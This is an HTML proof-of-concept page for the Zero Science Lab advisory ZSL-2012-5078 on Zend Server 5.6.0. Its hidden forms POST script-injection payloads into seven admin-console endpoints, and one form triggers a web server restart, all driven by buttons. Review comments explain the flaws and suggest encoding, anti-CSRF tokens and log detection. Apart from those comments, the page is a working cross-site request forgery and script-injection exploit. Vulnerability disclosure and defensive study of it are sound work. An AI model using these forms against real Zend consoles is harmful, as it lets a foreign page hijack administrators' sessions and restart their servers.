Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities
2012-03-12 11:15:04<!--
  Proof-of-concept harness for advisory ZSL-2012-5078 (Zend Server 5.6.0,
  per the page title). The page holds seven hidden forms (ids xss1..xss7)
  that POST to the Zend Server admin console at
  http://localhost:10081/ZendServer/ and one form (id rst) that POSTs to the
  web server restart action. Every form targets the iframe named ZSL_iframe,
  so each response is rendered inside this page.

  What the markup shows, for review:
  * Each injected value begins with a double quote and a closing angle
    bracket ahead of the script element, so it is shaped to end an attribute
    value and its tag. That suggests the console writes these fields back
    into an HTML attribute without encoding them (inferred from the payload
    shape; the server code is not on this page).
  * None of the forms carries a token field and all of them are submitted
    from a foreign page. Presumably they are only accepted when the browser
    already holds an authenticated console session, in which case the same
    requests also show that the console does not reject cross-site POSTs
    (confirm against the advisory).
  * alert() is used only as a visible marker that script ran.

  Hardening and detection notes:
  * Encode every directive, rule and URL value for the HTML context it is
    rendered in, and validate the values on the server (file paths, host
    lists, encodings, rule names).
  * Require a per-session anti-CSRF token and check Origin/Referer on every
    state-changing console endpoint, including restart.
  * Keep the console port reachable from a management network only.
  * In request or WAF logs, look for POSTs to the paths used below whose
    bodies contain markup characters in the listed parameters, or whose
    Origin/Referer is not the console itself.

  Opening the page also fetches a favicon, a logo and the initial iframe
  document from zeroscience.mk over plain http.
--><html><title>Download</title><link
rel="Shortcut Icon" href="http://zeroscience.mk/favicon.ico" type="image/x-icon"><body
bgcolor="#1C1C1C"><br
/> <img
style="margin-left:10" src="http://zeroscience.mk/images/zsl-logo1.png" hight="20%" width="20%"> <script type="text/javascript">var disclaimer = "This document and all the information it contains are provided \"as is\",\n" +
"for educational purposes only, without warranty of any kind, whether\n" +
"express or implied.\n\n" +
"The author reserves the right not to be responsible for the topicality,\n" +
"correctness, completeness or quality of the information provided in\n" +
"this document. Liability claims regarding damage caused by the use of\n" +
"any information provided, including any kind of information which is\n" +
"incomplete or incorrect, will therefore be rejected.";
// Show the disclaimer on load; a viewer who does not confirm is sent to http://www.zend.com.
var answ = confirm(disclaimer);
if (answ == true){}else{window.location.href = "http://www.zend.com";}
// One helper per form: each looks the form up by its id and submits it.
// They are called from the onClick attributes of the buttons further down.
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
function xss6(){document.forms["xss6"].submit();}
function xss7(){document.forms["xss7"].submit();}
// Submits the field-less restart form (id rst).
function rst(){document.forms["rst"].submit();}</script> <center><h2 style="position:absolute;left:525;top:32;background-color:#BAB8B9;width:200"> HTML Response:</h2></center> <!--
  Response pane. It first loads a text file from zeroscience.mk; afterwards
  every form posts into it by name (ZSL_iframe). The frame has no sandbox
  attribute, so a console response shown here runs any script it contains in
  the console's own origin.
--><iframe
src="http://www.zeroscience.mk/codes/zend_s03.txt" width="1100" height="700"
name="ZSL_iframe" align="top" frameborder="0" style="position:absolute;left:525;
top:80;background-color:#cecece;"></iframe> <font
color="#414141" size="2" style="position:absolute;top:795px;right:55px">v0.3</font> <br
/><!--
  Form xss1: POST to Directives/Save for the extension whose base64 path
  segment decodes to "Zend Optimizer+". The marker is sent in
  directives[zend_optimizerplus.blacklist_filename]; trgtAction and
  searchName are fixed values sent with it. A directive that names a file
  should be validated as a path on save and encoded on output.
--><form
action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr"
enctype="application/x-www-form-urlencoded" method="POST" id="xss1" target="ZSL_iframe"> <input
type="hidden" name="trgtAction" value="Search" /> <input
type="hidden" name="searchName" value='ext:Zend Optimizer+' /> <input
type="hidden" name='directives[zend_optimizerplus.blacklist_filename]' value='"><script>alert(1);</script>' /></form><!--
  Form xss2: POST to Code-Tracing/Generate-Dump with the marker in traceUrl,
  the only field. A URL field should be parsed and limited to expected
  schemes and hosts before use, and encoded wherever it is displayed.
--><form
action="http://localhost:10081/ZendServer/Code-Tracing/Generate-Dump"
enctype="application/x-www-form-urlencoded" method="POST" id="xss2" target="ZSL_iframe"> <input
type="hidden" name="traceUrl" value='"><script>alert("ZSL");</script>' /></form><!--
  Form xss3: POST to Page-Cache/Save-Rule. Three fields carry markers: host,
  name and path, told apart by alert(1), alert(2) and alert(3). The other
  fields are plain values sent with them (presumably what the rule editor
  normally submits; not verifiable from this page).
--><form
action="http://localhost:10081/ZendServer/Page-Cache/Save-Rule"
enctype="application/x-www-form-urlencoded" method="POST" id="xss3" target="ZSL_iframe"> <input
type="hidden" name="compression" value="1" /> <input
type="hidden" name="host" value='"><script>alert(1);</script>' /> <input
type="hidden" name="lifetime" value="11" /> <input
type="hidden" name="matchConditions" value="ALL" /> <input
type="hidden" name="name" value='"><script>alert(2);</script>' /> <input
type="hidden" name="path" value='"><script>alert(3);</script>' /> <input
type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionMatch]' value="1" /> <input
type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionType]' value="equals" /> <input
type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionValue]' value="1" /> <input
type="hidden" name='rule[zend_widget_pageCache_condition_5][conditionVar]' value="_GET" /> <input
type="hidden" name="schema" value="http" /> <input
type="hidden" name="type" value="exact" /></form><!--
  Form xss4: POST to Job-Queue-Scheduling/Save-Rule with the marker in
  ruleName. ruleUrl is http://www.zeroscience.mk, the schedule fields select
  "schedule-every" with scheduleEveryHours set to 1, and ruleId is empty
  (presumably a new rule; confirm). As this is a save action the name is
  likely stored and rendered again for whoever later views the rule
  (inferred; the page title calls the issue script insertion).
--><form
action="http://localhost:10081/ZendServer/Job-Queue-Scheduling/Save-Rule"
enctype="application/x-www-form-urlencoded" method="POST" id="xss4" target="ZSL_iframe"> <input
type="hidden" name="ruleId" value="" /> <input
type="hidden" name="ruleName" value='"><script>alert("ZSL");</script>' /> <input
type="hidden" name="ruleUrl" value="http://www.zeroscience.mk" /> <input
type="hidden" name="scheduleDailyTime" value="" /> <input
type="hidden" name="scheduleEvery" value="schedule-every-hours" /> <input
type="hidden" name="scheduleEveryHours" value="1" /> <input
type="hidden" name="scheduleEveryMinutes" value="" /> <input
type="hidden" name="scheduleHourlyMinute" value="" /> <input
type="hidden" name="scheduleMonthlyDay" value="" /> <input
type="hidden" name="scheduleMonthlyTime" value="" /> <input
type="hidden" name="scheduleType" value="schedule-every" /> <input
type="hidden" name="scheduleWeeklyTime" value="" /></form><!--
  Form xss5: POST to Directives/Save; the path segment (base64, with
  URL-encoded padding) decodes to "Zend Java Bridge". The marker is sent in
  directives[zend_jbridge.encoding]. An encoding name can be checked against
  a fixed list of known encodings on save.
--><form
action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBKYXZhIEJyaWRnZQ%3D%3D"
enctype="application/x-www-form-urlencoded" method="POST" id="xss5" target="ZSL_iframe"> <input
type="hidden" name="trgtAction" value="Search" /> <input
type="hidden" name="searchName" value='ext:Zend Java Bridge' /> <input
type="hidden" name="directives[zend_jbridge.encoding]" value='"><script>alert(1);</script>' /></form><!--
  Form xss6: POST to Directives/Save; the path segment decodes to
  "Zend Debugger". Two fields carry markers: directives[zend_debugger.allow_hosts]
  with alert(1) and directives[zend_debugger.deny_hosts] with alert(2).
  Host list values should be validated as address entries on save.
--><form
action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBEZWJ1Z2dlcg%3D%3D"
enctype="application/x-www-form-urlencoded" method="POST" id="xss6" target="ZSL_iframe"> <input
type="hidden" name="trgtAction" value="Search" /> <input
type="hidden" name="searchName" value='ext:Zend Debugger' /> <input
type="hidden" name="directives[zend_debugger.allow_hosts]" value='"><script>alert(1);</script>' /> <input
type="hidden" name="directives[zend_debugger.deny_hosts]" value='"><script>alert(2);</script>' /></form><!--
  Form xss7: POST to Directives/Save with the marker in
  directives[zend_codetracing.log_file].
  NOTE(review): the path segment here is the same one form xss1 uses and
  decodes to "Zend Optimizer+", while searchName and the directive refer to
  Zend Code Tracing. Left as published. For log matching, key on the
  directive name in the request body rather than on the path segment.
--><form
action="http://localhost:10081/ZendServer/Directives/Save/extension/WmVuZCBPcHRpbWl6ZXIr"
enctype="application/x-www-form-urlencoded" method="POST" id="xss7" target="ZSL_iframe"> <input
type="hidden" name="trgtAction" value="Search" /> <input
type="hidden" name="searchName" value='ext:Zend Code Tracing' /> <input
type="hidden" name='directives[zend_codetracing.log_file]' value='"><script>alert(1);</script>' /></form><!--
  Form rst: POST with no fields to Configuration/Webserver-Restart; its
  button below is labelled "8. Restart PHP". This form element is not closed
  before the end of the body, so all eight buttons sit inside it. They are
  type="button", so none of them submits this form by itself; each calls its
  helper through onClick. A restart that a foreign page can request is an
  availability problem in its own right, so the endpoint should demand an
  anti-CSRF token like the save actions.
--><form
action="http://localhost:10081/ZendServer/Configuration/Webserver-Restart"
enctype="application/x-www-form-urlencoded" method="POST" id="rst" target="ZSL_iframe"> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="1. XSS POST Injection --> 'directives[zend_optimizerplus.blacklist_filename]'" onClick="xss1()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="2. XSS POST Injection --> 'traceUrl'" onClick="xss2()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="3. XSS POST Injection --> 'host', 'name', 'path'" onClick="xss3()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="4. XSS POST Injection --> 'ruleName'" onClick="xss4()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="5. XSS POST Injection --> 'directives[zend_jbridge.encoding]'" onClick="xss5()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="6. XSS POST Injection --> 'directives[zend_debugger.allow_hosts]'" onClick="xss6()" /> <br
/><br
/> <input
type="button"
style="color:white;background-color:#2C3C8C;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:10;padding-bottom:10;margin-left:10"
value="7. XSS POST Injection --> 'directives[zend_codetracing.log_file]'" onClick="xss7()" /> <br
/><br
/><br
/><br
/> <input
type="button"
style="color:white;background-color:#c05c5c;cursor:pointer;border-style:groove;border-color:black;
width:470;text-align:left;padding-top:5;padding-bottom:5;margin-left:10"
value="8. Restart PHP" onClick="rst()" /> <br
/><br
/> <br
/><br
/> <font
color="gray" size="2" style="margin-left:10">© 2012. <a
href="http://www.zeroscience.mk"
target="_blank" style="text-decoration:none"><font
color="gray">Zero Science Lab</font></a><br
/> <font
style="margin-left:10">Macedonian Information Security Research And Development Laboratory</font> <br
/><font
style="margin-left:10"> Proof of Concept (PoC) code for advisory ID: <a
href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5078.php" target="ZSL_iframe"
style="text-decoration:none"><font
color="gray">ZSL-2012-5078</font></a></font></body></html>